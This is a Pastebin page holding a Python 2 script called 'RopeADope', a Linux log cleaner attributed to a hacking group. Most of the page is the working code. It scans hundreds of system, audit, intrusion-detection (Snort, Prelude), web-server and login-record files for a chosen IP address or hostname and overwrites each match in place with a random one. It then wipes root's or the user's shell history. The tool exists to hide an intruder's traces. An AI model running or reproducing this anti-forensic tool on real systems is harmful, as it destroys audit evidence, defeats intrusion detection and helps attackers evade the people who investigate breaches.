Advertisement
joemccray

Log Cleaner Python Script

Nov 22nd, 2016
855
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 22.99 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: latin-1 -*- ######################################################
  3. #                ____                     _ __                                 #
  4. #     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
  5. #    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
  6. #   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
  7. #                                            /___/ team                        #
  8. #                                                                              #
  9. # Ropeadope.py -- RopeADope v1.1                                               #
  10. #                                                                              #
  11. # DATE                                                                         #
  12. # 04/20/2012                                                                   #
  13. #                                                                              #
  14. # DESCRIPTION                                                                  #
  15. # A linux log cleaner                                                          #
  16. #                                                                              #
  17. # AUTHOR                                                                       #
  18. # pr1me [at] highhacksociety [dot] com                                         #
  19. # http://www.nullsecurity.net/ - http://www.highhacksociety                    #
  20. #                                                                              #
  21. ################################################################################                                                                          #
  22.  
  23. import sys
  24. import os
  25. import re
  26. import random
  27. import time
  28. import StringIO
  29. import commands
  30. import mmap
  31.  
  32. def banner():
  33.   print """
  34.  
  35. 888888ba                               .d888888  888888ba                              
  36. 88     8b                             d8'    88  88     8b                            
  37. a88aaaa8P' .d8888b.  88d888b. .d8888b. 88aaaaa88a 88     88 .d8888b.  88d888b. .d8888b.
  38. 88    8b. 88'   88  88'   88 88ooood8 88     88  88     88 88'   88  88'   88 88ooood8
  39. 88     88 88.  .88  88.  .88 88.  ... 88     88  88    .8P 88.  .88  88.  .88 88.  ...
  40. dP     dP  88888P'  88Y888P'  88888P' 88     88  8888888P   88888P'  88Y888P'  88888P'
  41. oooooooooooooooooooo~88~ooooooooooooooooooooooooooooooooooooooooooooo~88~ooooooooooooooo
  42.                     dP                                               dP            v1.1
  43.  
  44.          [--]          RopeADope v1.1 - Linux Log Cleaner          [--]
  45.          [--]                   Written By: pr1me                  [--]
  46.          [--]               http://www.nullsecurity.net            [--]
  47.  
  48. """
  49.  
  50. def IPChk(ipaddr):
  51.   pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
  52.   if re.match(pattern, ipaddr):
  53.     return True
  54.   else:
  55.     return False
  56.  
  57. def randomIP():
  58.   global randIP
  59.   randIP = '.'.join([str(random.randint(1,254)) for x in range(4)])
  60.  
  61. def randomHost():
  62.   global randhost
  63.   beginning = ''.join(random.choice("abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789") for x in range(8))
  64.   end = ['.aero','.arpa','.asia','.biz','.cat','.com','.coop','.edu','.eu','.gov','.info','.int','.jobs','.mil','.mobi','.museum','.name','.net','.org','.post','.pro','.tel','.travel','.xxx','.ac','.ad','.ae','.af','.ag','.ai','.al','.am','.an','.ao','.aq','.ar','.as','.at','.au','.aw','.ax','.az','.ba','.bb','.bd','.be','.bf','.bg','.bh','.bi','.bj','.bm','.bn','.bo','.br','.bs','.bt','.bv','.bw','.by','.bz','.ca','.cc','.cd','.cf','.cg','.ch','.ci','.ck','.cl','.cm','.cn','.co','.cr','.cs','.cu','.cv','.cx','.cy','.cz','.dd','.de','.dj','.dk','.dm','.do','.dz','.ec','.ee','.eg','.eh','.er','.es','.et','.eu','.fi','.fj','.fk','.fm','.fo','.fr','.ga','.gb','.gd','.ge','.gf','.gg','.gh','.gi','.gl','.gm','.gn','.gp','.gq','.gr','.gs','.gt','.gu','.gw','.gy','.hk','.hm','.hn','.hr','.ht','.hu','.id','.ie','.il','.im','.in','.io','.iq','.ir','.is','.it','.je','.jm','.jo','.jp','.ke','.kg','.kh','.ki','.km','.kn','.kp','.kr','.kw','.ky','.kz','.la','.lb','.lc','.li','.lk','.lr','.ls','.lt','.lu','.lv','.ly','.ma','.mc','.md','.me','.mg','.mh','.mk','.ml','.mm','.mn','.mo','.mp','.mq','.mr','.ms','.mt','.mu','.mv','.mw','.mx','.my','.mz','.na','.nc','.ne','.nf','.ng','.ni','.nl','.no','.np','.nr','.nu','.nz','.om','.pa','.pe','.pf','.pg','.ph','.pk','.pl','.pm','.pn','.pr','.ps','.pt','.pw','.py','.qa','.re','.ro','.rs','.ru','.rw','.sa','.sb','.sc','.sd','.se','.sg','.sh','.si','.sj','.sk','.sl','.sm','.sn','.so','.sr','.st','.su','.sv','.sy','.sz','.tc','.td','.tf','.tg','.th','.tj','.tk','.tl','.tm','.tn','.to','.tp','.tr','.tt','.tv','.tw','.tz','.ua','.ug','.uk','.um','.us','.uy','.uz','.va','.vc','.ve','.vg','.vi','.vn','.vu','.wf','.ws','.ye','.yt','.yu','.za','.zm','.zr','.zw']
  65.   randend = random.choice(end)
  66.   randhost = beginning + randend
  67.  
  68. def searchanddestroy():
  69.   if hitme == 1:
  70.     randomIP()
  71.     for log in goodLogs:
  72.       datafile = file(log)
  73.       for line in datafile:
  74.         if ipaddr in line:
  75.           print "\n[*] Found IP in",log
  76.           f = open(log, "rb+")
  77.           size = os.path.getsize(log)
  78.           dizz = mmap.mmap(f.fileno(), size)
  79.           place = dizz.find(ipaddr)
  80.           if place == -1:
  81.             dizz.close()
  82.           else:
  83.             print "\tEditing IP"
  84.             dizz.seek(place)
  85.             dizz.write(randIP)
  86.             dizz.close()
  87.           print "\n[*] This House Is Clean.\n"
  88.   elif hitme == 2:
  89.     randomHost()
  90.     for log in goodLogs:
  91.       datafile = file(log)
  92.       for line in datafile:
  93.         if host in line:
  94.           print "\n[*] Found Host in",log
  95.           f = open(log, "rb+")
  96.           size = os.path.getsize(log)
  97.           dizz = mmap.mmap(f.fileno(), size)
  98.           place = dizz.find(host)
  99.           if place == -1:
  100.             dizz.close()
  101.           else:
  102.             print "\tEditing Host"
  103.             dizz.seek(place)
  104.             dizz.write(randhost)
  105.             dizz.close()
  106.           print "\n[*] This House Is Clean.\n"
  107.   else:
  108.     sys.exit("You've fucked something up. PEBKAC!\n")
  109.  
  110. def searchanddestroy2():
  111.   if hitme == 1:
  112.     randomIP()
  113.     for log2 in mlogz:
  114.       datafile = file(log2)
  115.       for line in datafile:
  116.         if ipaddr in line:
  117.           print "\n[*] Found IP in",log2
  118.           f = open(log2, "rb+")
  119.           size = os.path.getsize(log2)
  120.           dizz = mmap.mmap(f.fileno(), size)
  121.           place = dizz.find(ipaddr)
  122.           if place == -1:
  123.             dizz.close()
  124.           else:
  125.             print "\tEditing IP"
  126.             dizz.seek(place)
  127.             dizz.write(randIP)
  128.             dizz.close()
  129.           print "\n[*] This House Is Clean.\n"
  130.   elif hitme == 2:
  131.     randomHost()
  132.     for log2 in mlogz:
  133.       datafile = file(log2)
  134.       for line in datafile:
  135.         if host in line:
  136.           print "\n[*] Found Host in",log2
  137.           f = open(log2, "rb+")
  138.           size = os.path.getsize(log2)
  139.           dizz = mmap.mmap(f.fileno(), size)
  140.           place = dizz.find(host)
  141.           if place == -1:
  142.             dizz.close()
  143.           else:
  144.             print "\tEditing Host"
  145.             dizz.seek(place)
  146.             dizz.write(randhost)
  147.             dizz.close()
  148.           print "\n[*] This House Is Clean.\n"
  149.   else:
  150.     sys.exit("You've fucked something up. PEBKAC!\n")
  151.  
  152. def validlogs():
  153.   global logfilez
  154.   #List of log files - Add your own or use the custom field option
  155.   logfilez = ['/var/adm/utmp','/usr/adm/utmp','/etc/utmp','/var/log/utmp','/var/run/utmp','/var/adm/utmp','/var/run/utmp','/usr/var/adm/utmp','/var/adm/wtmp','/usr/adm/wtmp','/etc/wtmp','/var/log/wtmp','/var/adm/wtmp','/var/run/wtmp','/usr/var/adm/wtmp','/var/adm/utmpx','/usr/adm/utmpx','/usr/run/utmpx','/etc/utmpx','/var/log/utmpx','/var/run/utmpx','/usr/var/adm/utmpx','/var/adm/wtmpx','/usr/adm/wtmpx','/etc/wtmpx','/var/log/wtmpx','/var/run/wtmpx','/usr/adm/wtmpx','/usr/var/adm/wtmpx','/var/adm/lastlog','/usr/adm/lastlog','/etc/lastlog','/var/log/lastlog','/usr/adm/lastlog','/usr/run/lastlog','/usr/var/adm/lastlog','/var/adm/pacct','/var/account/pacct','/var/log/acct','/var/log/pacct','/var/adm/acct','/var/adm/pacct','/var/account/acct','/usr/adm/acct','/var/log/prelude.log','/var/log/prelude/prelude.log','/var/adm/prelude/prelude.log','/var/adm/prelude/log/prelude.log','/var/adm/log/prelude.log','/var/ids/log/prelude.log','/var/ids/prelude/log/prelude.log','/var/ids/prelude.log','/var/prelude/prelude.log','/var/prelude/log/prelude.log','/home/log/prelude.log','/home/ids/log/prelude.log','/home/prelude/log/prelude.log','/home/ids/prelude.log','/home/prelude/prelude.log','/home/log/prelude.log','/usr/local/var/log/prelude.log','/var/log/prelude-xml.log','/var/log/prelude/prelude-xml.log','/var/adm/prelude/prelude-xml.log','/var/adm/prelude/log/prelude-xml.log','/var/adm/log/prelude-xml.log','/var/ids/log/prelude-xml.log','/var/ids/prelude/log/prelude-xml.log','/var/ids/prelude-xml.log','/var/prelude/prelude-xml.log','/var/prelude/log/prelude-xml.log','/home/log/prelude-xml.log','/home/ids/log/prelude-xml.log','/home/prelude/log/prelude-xml.log','/home/ids/prelude-xml.log','/home/prelude/prelude-xml.log','/home/log/prelude-xml.log','/usr/local/var/log/prelude-xml.log','/var/log/samba/log.smbd','/var/log/samba/log.nmbd','/var/log/log.smbd','/var/log/log.nmbd','/var/log/smb/log.smbd','/var/log/smb/log.nmbd','/home/samba/log.smbd','/home/samba/log.nmbd','/home/samba/log/log.smbd','/home/samba/log/log.nmbd','/home/samba/logs/log.smbd','/home/samba/logs/log.nmbd','/var/log/snort/snort.alert','/var/log/snort.alert','/var/log/ids/snort.alert','/var/ids/snort/snort.alert','/var/ids/snort.alert','/var/snort/snort.alert','/home/snort/snort.alert','/home/snort/log/snort.alert','/home/log/snort/snort.alert','/home/log/snort.alert','/home/ids/snort/snort.alert','/home/ids/snort.alert','/usr/local/ids/snort.alert','/usr/local/var/snort.alert','/usr/local/snort/snort.alert','/usr/local/var/log/snort.alert','/usr/local/snort/log/snort.alert','/usr/local/ids/log/snort.alert','/usr/local/log/snort.alert','/usr/local/log/snort/snort.alert','/var/log/apache2/audit_log','/var/log/apache1/audit_log','/var/log/apache/audit_log','/home/apache2/log/audit_log','/home/apache1/log/audit_log','/home/apache/log/audit_log','/home/http/log/audit_log','/home/httpd/log/audit_log','/var/log/http/audit_log','/var/log/httpd/audit_log','/usr/http/log/audit_log','/usr/httpd/log/audit_log','/usr/local/http/log/audit_log','/usr/local/httpd/log/audit_log','/usr/local/apache/log/audit_log','/usr/local/apache2/log/audit_log','/usr/local/apache1/log/audit_log','/var/www/log/audit_log','/var/http/log/audit_log','/var/httpd/log/audit_log','/var/apache/log/audit_log','/var/apache2/log/audit_log','/var/apache1/log/audit_log','/root/.bash_history','/root/.history','/root/.sh_history','/.bash_history','/.history','/.sh_history','/tmp/.bash_history','/tmp/.sh_history','/tmp/.history','/home/apache/.bash_history','/home/apache/.sh_history','/home/apache/.history','/home/apache1/.bash_history','/home/apache1/.sh_history','/home/apache1/.history','/home/apache2/.bash_history','/home/apache2/.sh_history','/home/apache2/.history','/home/httpd/.bash_history','/home/httpd/.sh_history','/home/httpd/.history','/home/ftpd/.bash_history','/home/ftpd/.sh_history','/home/ftpd/.history','/var/log/apache2/access_log','/var/log/apache2/access_log.1','/var/log/apache2/access_log.2','/var/log/apache2/error_log','/var/log/apache2/error_log.1','/var/log/apache2/error_log.2','/var/log/apache2/ssl_access_log','/var/log/apache2/ssl_access_log.1','/var/log/apache2/ssl_access_log.2','/var/log/apache2/ssl_error_log','/var/log/apache2/ssl_request_log','/var/log/apache2/request_log','/var/log/apache/access_log','/var/log/apache/access_log.1','/var/log/apache/access_log.2','/var/log/apache/error_log','/var/log/apache/error_log.1','/var/log/apache/error_log.2','/var/log/apache/ssl_access_log','/var/log/apache/ssl_error_log','/var/log/apache/ssl_request_log','/var/log/apache/request_log','/var/log/apache1/access_log','/var/log/apache1/error_log','/var/log/apache1/ssl_access_log','/var/log/apache1/ssl_error_log','/var/log/apache1/ssl_request_log','/var/log/apache1/request_log','/var/www/log/access_log','/var/www/log/error_log','/var/www/log/ssl_access_log','/var/www/log/ssl_error_log','/var/www/log/ssl_request_log','/var/www/log/request_log','/var/apache2/access_log','/var/apache2/error_log','/var/apache2/ssl_access_log','/var/apache2/ssl_error_log','/var/apache2/ssl_request_log','/var/apache2/request_log','/home/apache2/access_log','/home/apache2/error_log','/home/apache2/ssl_access_log','/home/apache2/ssl_error_log','/home/apache2/ssl_request_log','/home/apache2/request_log','/var/web/log/access_log','/var/web/log/error_log','/var/web/log/ssl_access_log','/var/web/log/ssl_error_log','/var/web/log/ssl_request_log','/var/web/log/request_log','/var/apache/access_log','/var/apache/error_log','/var/apache/ssl_access_log','/var/apache/ssl_error_log','/var/apache/ssl_request_log','/var/apache/request_log','/home/apache/access_log','/home/apache/error_log','/home/apache/ssl_access_log','/home/apache/ssl_error_log','/home/apache/ssl_request_log','/home/apache/request_log','/var/apache1/access_log','/var/apache1/error_log','/var/apache1/ssl_access_log','/var/apache1/ssl_error_log','/var/apache1/ssl_request_log','/var/apache1/request_log','/home/apache1/access_log','/home/apache1/error_log','/home/apache1/ssl_access_log','/home/apache1/ssl_error_log','/home/apache1/ssl_request_log','/home/apache1/request_log','/usr/apache1/error_log','/usr/apache1/ssl_access_log','/usr/apache1/ssl_error_log','/usr/apache1/ssl_request_log','/usr/apache1/request_log','/usr/local/apache1/error_log','/usr/local/apache1/ssl_access_log','/usr/local/apache1/ssl_error_log','/usr/local/apache1/ssl_request_log','/usr/local/apache1/request_log','/usr/apache2/error_log','/usr/apache2/ssl_access_log','/usr/apache2/ssl_error_log','/usr/apache2/ssl_request_log','/usr/apache2/request_log','/usr/local/apache2/error_log','/usr/local/apache2/ssl_access_log','/usr/local/apache2/ssl_error_log','/usr/local/apache2/ssl_request_log','/usr/local/apache2/request_log','/usr/apache/error_log','/usr/apache/ssl_access_log','/usr/apache/ssl_error_log','/usr/apache/ssl_request_log','/usr/apache/request_log','/usr/local/apache/error_log','/usr/local/apache/ssl_access_log','/usr/local/apache/ssl_error_log','/usr/local/apache/ssl_request_log','/usr/local/apache/request_log','/usr/local/httpd/access_log','/usr/local/httpd/ssl_access_log','/usr/local/httpd/error_log','/usr/local/httpd/ssl_error_log','/usr/local/httpd/ssl_request_log','/home/httpd/access_log','/home/httpd/ssl_access_log','/home/httpd/error_log','/home/httpd/ssl_error_log','/var/adm/SYSLOG','/var/adm/sulog','/var/adm/utmp','/var/adm/utmpx','/var/adm/wtmp','/var/adm/wtmpx','/var/adm/lastlog/username','/usr/spool/lp/log','/var/adm/lp/lpd-errs','/usr/lib/cron/log','/var/adm/loginlog','/var/adm/pacct','/var/adm/dtmp','/var/adm/acct/sum/loginlog','/var/adm/X0msgs','/var/adm/crash/vmcore','/var/adm/crash/unix','/var/adm/pacct','/var/adm/wtmp','/var/adm/dtmp','/var/adm/qacct','/var/adm/sulog','/var/adm/ras/errlog','/var/adm/ras/bootlog','/var/adm/cron/log','/etc/utmp','/etc/security/lastlog','/etc/security/failedlogin','/usr/spool/mqueue/syslog','/var/adm/messages','/var/adm/aculogs','/var/adm/aculog','/var/adm/sulog','/var/adm/vold.log','/var/adm/wtmp','/var/adm/wtmpx','/var/adm/utmp','/var/adm/utmpx','/var/adm/log/asppp.log','/var/log/syslog','/var/log/POPlog','/var/log/authlog','/var/log/auth1.log','/var/adm/pacct','/var/lp/logs/lpsched','/var/lp/logs/lpNet','/var/lp/logs/requests','/var/cron/log','/var/saf/_log','/var/saf/port/log','/var/adm/utmp','/var/log/utmp','/var/run/utmp','/var/adm/utmp','/var/run/utmp','/usr/var/adm/utmp','/var/adm/wtmp','/var/log/wtmp','/var/adm/wtmp','/var/run/wtmp','/usr/var/adm/wtmp','/var/adm/utmpx','/var/log/utmpx','/var/run/utmpx','/usr/var/adm/utmpx','/var/adm/wtmpx','/var/log/wtmpx','/var/run/wtmpx','/usr/var/adm/wtmpx','/var/adm/lastlog','/var/log/lastlog','/usr/var/adm/lastlog','/var/adm/pacct','/var/account/pacct','/var/log/acct','/var/log/pacct','/var/adm/acct','/var/adm/pacct','/var/account/acct','/var/log/prelude.log','/var/log/prelude/prelude.log','/var/adm/prelude/prelude.log','/var/adm/prelude/log/prelude.log','/var/adm/log/prelude.log','/var/ids/log/prelude.log','/var/ids/prelude/log/prelude.log','/var/ids/prelude.log','/var/prelude/prelude.log','/var/prelude/log/prelude.log','/usr/local/var/log/prelude.log','/var/log/prelude-xml.log','/var/log/prelude/prelude-xml.log','/var/adm/prelude/prelude-xml.log','/var/adm/prelude/log/prelude-xml.log','/var/adm/log/prelude-xml.log','/var/ids/log/prelude-xml.log','/var/ids/prelude/log/prelude-xml.log','/var/ids/prelude-xml.log','/var/prelude/prelude-xml.log','/var/prelude/log/prelude-xml.log','/usr/local/var/log/prelude-xml.log','/var/log/samba/log.smbd','/var/log/samba/log.nmbd','/var/log/log.smbd','/var/log/log.nmbd','/var/log/smb/log.smbd','/var/log/smb/log.nmbd','/var/log/snort/snort.alert','/var/log/snort.alert','/var/log/ids/snort.alert','/var/ids/snort/snort.alert','/var/ids/snort.alert','/var/snort/snort.alert','/usr/local/var/snort.alert','/usr/local/var/log/snort.alert','/var/log/apache2/audit_log','/var/log/apache1/audit_log','/var/log/apache/audit_log','/var/log/http/audit_log','/var/log/httpd/audit_log','/var/www/log/audit_log','/var/http/log/audit_log','/var/httpd/log/audit_log','/var/apache/log/audit_log','/var/apache2/log/audit_log','/var/apache1/log/audit_log','/var/log/apache2/access_log','/var/log/apache2/access_log.1','/var/log/apache2/access_log.2','/var/log/apache2/error_log','/var/log/apache2/error_log.1','/var/log/apache2/error_log.2','/var/log/apache2/ssl_access_log','/var/log/apache2/ssl_access_log.1','/var/log/apache2/ssl_access_log.2','/var/log/apache2/ssl_error_log','/var/log/apache2/ssl_request_log','/var/log/apache2/request_log','/var/log/apache/access_log','/var/log/apache/access_log.1','/var/log/apache/access_log.2','/var/log/apache/error_log','/var/log/apache/error_log.1','/var/log/apache/error_log.2','/var/log/apache/ssl_access_log','/var/log/apache/ssl_error_log','/var/log/apache/ssl_request_log','/var/log/apache/request_log','/var/log/apache1/access_log','/var/log/apache1/error_log','/var/log/apache1/ssl_access_log','/var/log/apache1/ssl_error_log','/var/log/apache1/ssl_request_log','/var/log/apache1/request_log','/var/www/log/access_log','/var/www/log/error_log','/var/www/log/ssl_access_log','/var/www/log/ssl_error_log','/var/www/log/ssl_request_log','/var/www/log/request_log','/var/apache2/access_log','/var/apache2/error_log','/var/apache2/ssl_access_log','/var/apache2/ssl_error_log','/var/apache2/ssl_request_log','/var/apache2/request_log','/var/web/log/access_log','/var/web/log/error_log','/var/web/log/ssl_access_log','/var/web/log/ssl_error_log','/var/web/log/ssl_request_log','/var/web/log/request_log','/var/apache/access_log','/var/apache/error_log','/var/apache/ssl_access_log','/var/apache/ssl_error_log','/var/apache/ssl_request_log','/var/apache/request_log','/var/apache1/access_log','/var/apache1/error_log','/var/apache1/ssl_access_log','/var/apache1/ssl_error_log','/var/apache1/ssl_request_log','/var/apache1/request_log','/var/log','/var/adm','/var/spool/mqueue','/var/mail','/var/log/emerge.log','/var/log/Xorg.0.log','/root/.bash_history','/root/.bash_logout','/usr/local/apache/logs','/usr/local/apache/log','/var/apache/logs','/var/apache/log','/var/run/utmp','/var/logs','/var/log','/var/adm','/etc/wtmp','/etc/utmp','/var/log/lastlog','/var/log/syslog','/var/log/messages','/var/log/httpd/access_log','/var/log/httpd/access.log','/var/log/httpd/error_log','/var/log/httpd/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/log/apache2/error.log','/var/log/apache2/error_log','/var/log/wtmp','/var/log/secure','/var/log/xferlog','/var/log/auth.log','/var/log/lighttpd/lighttpd.error.log','/var/log/lighttpd/lighttpd.access.log','/var/run/utmp','/var/www/logs/access_log','/var/www/logs/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/yum.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log']
  156.   global goodLogs
  157.   goodLogs = []
  158.  
  159.   print "[*] Checking for active log files\n"
  160.   for a in logfilez:
  161.     if os.path.isfile(a) == True:
  162.       goodLogs.append(a)
  163.   if len(goodLogs)>0:
  164.     print "[*] Active logs files found:",len(goodLogs)
  165.     for b in goodLogs:
  166.       print "\t"+b
  167.   else:
  168.     print "[-] No active log files found"
  169.     sys.exit()
  170.  
  171. def morelogz():
  172.   global mlogz
  173.   mlogz = []
  174.   mlogzcheck = []
  175.   os.chdir("/")
  176.   print "[*] Looking for more log files..."
  177.   logfilez2 = StringIO.StringIO(commands.getstatusoutput('find . -iname *.log -print')[1]).readlines()  
  178.   if len(logfilez2)>0:
  179.     for a in logfilez2:
  180.       foo = a.strip('\n')
  181.            mlogzcheck.append(foo)
  182.     for b in mlogzcheck:
  183.       if os.path.isfile(b) == True:
  184.         mlogz.append(b)
  185.   print "\t[*] Found:",len(mlogz),"extra logfiles"
  186.   return mlogz
  187.  
  188. def main():
  189.   banner()
  190.   print ""
  191.   if os.geteuid() != 0:
  192.     print "\nNot running as root. Only logz accessible by non privileged users will be edited."
  193.    
  194.   raw_input("Press enter to get started...\n")
  195.  
  196.   validlogs()
  197.  
  198.   choice = raw_input("\nDo you want to search for more logs? [yes or no] ")
  199.   if choice == "yes" or choice == "YES" or choice == "Yes":
  200.     hollaback = 1
  201.     morelogz()
  202.   elif choice == "no" or choice == "NO" or choice == "No":
  203.     hollaback = 2
  204.     pass
  205.   else:
  206.     sys.exit("It's really not that difficult. Choose either yes or no fucker!\n")
  207.    
  208.   global hitme
  209.   global ipaddr
  210.   global host
  211.   choice1 = raw_input("\nWould you like to remove a IP address or Hostname? [ip or hostname] ")
  212.   if choice1 == "IP" or choice1 == "ip":
  213.     hitme = 1
  214.     ipaddr = raw_input("\tWhat IP address would you like removed from the logs? ")
  215.     while IPChk(ipaddr) != True:
  216.       print "\n\tInvalid IP! Try again!"
  217.       ipaddr = raw_input("\tWhat IP address would you like removed from the logs? ")
  218.     else:
  219.       if hollaback == 1:
  220.         searchanddestroy()
  221.         searchanddestroy2()
  222.       else:
  223.         searchanddestroy()
  224.   elif choice1 == "HOSTNAME" or choice1 == "hostname":
  225.     hitme = 2
  226.     host = raw_input("\tWhat Hostname would you like removed from the logs? ")
  227.     if hollaback == 1:
  228.       searchanddestroy()
  229.       searchanddestroy2()
  230.     else:
  231.       searchanddestroy()
  232.   else:
  233.     sys.exit("It's really not that difficult. Choose either ip or hostname fucker!\n")
  234.    
  235.   if os.geteuid() == 0:
  236.     w = open("/root/.bash_history", 'w')
  237.     w.write("")
  238.     w.close()
  239.  
  240.   else:
  241.     user = os.getenv('USERNAME')
  242.     w = open("/home/"+user+"/.bash_history", 'w')
  243.     w.write("")
  244.     w.close()
  245.  
  246. if __name__ == "__main__":
  247.   try:
  248.     main()
  249.   except KeyboardInterrupt:
  250.     print "\n"
  251.     sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement